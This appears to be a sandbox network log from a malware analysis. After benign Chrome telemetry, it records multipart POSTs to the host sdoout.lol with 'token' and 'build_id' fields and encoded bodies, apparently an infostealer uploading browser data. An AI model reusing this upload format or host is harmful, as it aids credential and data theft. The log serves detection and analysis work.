69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53 Data Ascii: ray.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a\|\|_.la});ma("S

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:46:19 UTC	726	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 913 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-31 08:46:19 UTC	913	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 35 36 33 34 37 37 37 36 39 37 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1735634777697",null,null,null,
2024-12-31 08:46:20 UTC	941	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=520=chJCRTLCN7iLr9x6s3I7zkf-dusBI1WYSyj9ey-MYSp9xu-lRTjx1T8WiO1IqNblZFnsdA62HxmB2dGuXtWoY4a7-hU4EjE8UYu1OnoRqI-LoyKNhTDJBxggQDOt4926-mSxp7lvMfEQb6YIuwbVCuVL1j-ZfWSNlrdn7LnZfEg2HfhjThf3eX4; expires=Wed, 02-Jul-2025 08:46:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Tue, 31 Dec 2024 08:46:19 GMT Server: Playlog X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Tue, 31 Dec 2024 08:46:19 GMT Cache-Control: private Connection: close Transfer-Encoding: chunked
2024-12-31 08:46:20 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-12-31 08:46:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:46:21 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----gvk6phlxtj5p8q1ny58y User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 08:46:21 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 67 76 6b 36 70 68 6c 78 74 6a 35 70 38 71 31 6e 79 35 38 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 67 76 6b 36 70 68 6c 78 74 6a 35 70 38 71 31 6e 79 35 38 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 67 76 6b 36 70 68 6c 78 74 6a 35 70 38 71 31 6e 79 35 38 79 0d 0a 43 6f 6e 74 Data Ascii: ------gvk6phlxtj5p8q1ny58yContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------gvk6phlxtj5p8q1ny58yContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------gvk6phlxtj5p8q1ny58yCont
2024-12-31 08:46:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 08:46:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 08:46:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 08:46:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 08:46:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 08:46:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 08:46:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 08:46:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 08:46:21 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 08:46:22 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 08:46:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:46:23 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----phlfc2ngvaaieusr9ri5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 08:46:23 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 70 68 6c 66 63 32 6e 67 76 61 61 69 65 75 73 72 39 72 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 70 68 6c 66 63 32 6e 67 76 61 61 69 65 75 73 72 39 72 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 70 68 6c 66 63 32 6e 67 76 61 61 69 65 75 73 72 39 72 69 35 0d 0a 43 6f 6e 74 Data Ascii: ------phlfc2ngvaaieusr9ri5Content-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------phlfc2ngvaaieusr9ri5Content-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------phlfc2ngvaaieusr9ri5Cont
2024-12-31 08:46:23 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 08:46:23 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 08:46:23 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 08:46:23 UTC	16355	OUT	Data Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56 Data Ascii: 